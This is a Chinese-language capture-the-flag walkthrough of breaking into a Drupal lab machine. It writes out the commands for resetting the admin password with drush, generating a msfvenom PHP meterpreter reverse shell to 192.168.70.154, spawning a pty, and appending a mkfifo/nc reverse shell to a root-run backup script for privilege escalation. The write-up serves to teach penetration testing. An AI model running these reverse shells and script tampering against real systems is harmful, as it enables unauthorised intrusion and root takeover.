早几天做到这题是不是360考核就能多对一道题了,菜是原罪······
CMS还是Drupal,msf几个模块都没成功,扫描后台也没扫描出什么有用的信息。应该还是在网站上。
终于找到不一样的地方了。
网上搜索一下,提示github上面有,然后在config.php里面看到了信息,
网站登陆但是失败,但是想起最开始扫描端口时候开了ssh,那就试试SSH登陆。
登陆上来了。看下mbox。
这里有个root权限执行的东西。
进入文件夹查看一下。
发现只有root或者www-data权限才可以执行.sh
看一下具体内容。
有个drush命令。查一下是什么东东。
和Drupal有关的,专门用来管理Drupal站点的Shell,可以用来修改密码。
代码语言:javascript复制drush user-password someuser --password="correct horse battery staple"
进入/var/www/html目录进行操作。
代码语言:javascript复制drush user-password admin --password="hack123"
然后去网站登陆。
成功登陆。
随便翻翻,只有Content模块可以写入自己的东西,不出意外这里就是突破点了。
没有PHP语言,网上查了下,可以手动下载。
代码语言:javascript复制https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
如果下载显示连接失败的话可以下载到本地,再选择文件上传。
装好之后勾选PHP,然后下面install
有了PHP的选项。
然后就利用msf反弹Shell
代码语言:javascript复制msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.154 LPORT=7777 -f raw
生成Shell代码,复制到网站上去。直接选择PHP类型,不然容易失败。
然后msf使用handler模块开启监听。
代码语言:javascript复制set payload php/meterpreter/reverse_tcp
set lhost 192.168.70.154
set lport 7777
run
然后点击Preview
成功进入meterpreter,信息收集下。
进入Shell模式,利用Python获得交互式Shell
代码语言:javascript复制python -c "import pty;pty.spawn('/bin/bash')"
接下来卡住了,翻目录也没什么有用的信息。不知道下一步该做什么了。
翻看前面,突然想到,刚才看到了backup.sh只有root权限才能使用,这里应该是突破点吧。
但是吧,还是不知道怎么破,菜是原罪······
看了师傅的笔记,跟着师傅的思路走一下。
方向确实没错,是利用这个backups.sh
代码语言:javascript复制echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.70.154 4444 >/tmp/f" >> backups.sh
将反弹shell的代码附加到backups.sh脚本中
执行这条语句反弹回一个监听Shell
提权为root了!直接找flag即可。